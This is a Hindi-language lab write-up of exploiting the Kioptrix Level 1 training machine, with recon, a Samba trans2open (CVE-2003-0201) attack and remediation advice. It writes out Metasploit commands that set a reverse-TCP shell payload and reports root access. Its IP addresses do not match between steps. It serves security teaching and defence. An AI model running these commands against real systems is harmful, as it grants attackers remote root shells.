Kioptrix Level 1: पूर्ण-स्पेक्ट्रम भेद्यता ऑडिट और एक्सप्लॉइटेशन
🏛️ व्यावसायिक उद्देश्य
उद्देश्य Kioptrix Level 1 वातावरण पर एक संरचित पेनिट्रेशन परीक्षण करना था, ताकि पूर्ण 'root' अभिगम प्राप्त किया जा सके और रेड तथा ब्लू टीम संचालन दोनों के लिए उपयुक्त तकनीकी उपचार रणनीतियों का दस्तावेज़ीकरण किया जा सके।
🏗️ पर्यावरण पुनरुत्पादन (हार्डवेयर विवरण)
आधुनिक वर्चुअलाइज़ेशन डिफ़ॉल्ट प्रायः लीगेसी 2010 कर्नेल पर विफल हो जाते हैं। इस मशीन को सफलतापूर्वक बूट और नेटवर्क से जोड़ने के लिए, निम्नलिखित विशिष्ट आर्किटेक्चरल कॉन्फ़िगरेशन आवश्यक थे:
- OS सबटाइप: Linux / Red Hat (32-bit)।
- स्टोरेज आर्किटेक्चर: लीगेसी .vmdk हार्ड ड्राइव का समर्थन करने के लिए SATA से IDE कंट्रोलर में स्विच किया गया।
- नेटवर्क प्रोटोकॉल: Kali Linux अटैक मशीन के साथ आंतरिक संचार की अनुमति देने के लिए होस्ट-ओनली एडाप्टर के साथ PCI FAST-III के रूप में कॉन्फ़िगर किया गया।
⚔️ आक्रामक विश्लेषण (रेड टीम पथ)
एक्सप्लॉइटेशन ने मैनुअल एन्यूमरेशन-से-एक्सप्लॉइटेशन जीवनचक्र का पालन किया:
1. डिस्कवरी और रिकॉनिसांस
- Netdiscover: टारगेट IP की पहचान करने के लिए
netdiscover -r 192.168.184.4 का उपयोग किया गया।
- Nmap स्कैन: SSH (22), HTTP (80), RPC (111), और NetBIOS-SSN (139) सहित सेवाओं की पहचान की गई। Samba 2.2.1a को प्राथमिक प्रवेश बिंदु के रूप में चिह्नित किया गया।
2. एक्सप्लॉइटेशन (Samba trans2open)
- भेद्यता: CVE-2003-0201 (हीप ओवरफ्लो)।
- MITRE ATT&CK मैपिंग: - Tactic: Privilege Escalation (TA0004)
- Technique: Exploitation for Privilege Escalation (T1068)
- Metasploit प्रोटोकॉल:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- परिणाम: सफलतापूर्वक एक रिवर्स शेल स्पॉन किया गया। कमांड
whoami ने root लौटाया।
🛡️ रक्षात्मक उपचार (ब्लू टीम पथ)
एक एंटरप्राइज़ वातावरण को सुरक्षित करने के लिए, निम्नलिखित भेद्यता प्रबंधन (VM) रणनीतियाँ अनिवार्य हैं:
- पैचिंग प्रोटोकॉल: Samba को अपडेट करें नवीनतम समर्थित संस्करण (Samba 4.x) तक।
call_trans2open फ़ंक्शन में भेद्यता सभी आधुनिक संस्करणों में प्रभावी रूप से पैच की गई है।
- नेटवर्क हार्डनिंग: पोर्ट 139 और 445 को केवल विश्वसनीय आंतरिक सबनेट तक सीमित करने के लिए होस्ट-आधारित फ़ायरवॉल तैनात करें।
- VM भूमिका रणनीति: यह उपचार मानक व्यावसायिक-घंटे भेद्यता प्रबंधन चक्रों के अंतर्गत आता है, जिससे इंफ्रास्ट्रक्चर स्थिरता सुनिश्चित होती है।
📝 तकनीकी साक्ष्य और मैनुअल लॉग
निम्नलिखित छवियाँ लाइव मैनुअल एन्यूमरेशन और टर्मिनल निष्पादन का दस्तावेज़ीकरण करती हैं:
टारगेट डिस्कवरी और आर्किटेक्चर नोट्स


रूट एक्सेस प्रमाण (टर्मिनल स्नैपशॉट)
रूट शेल साक्ष्य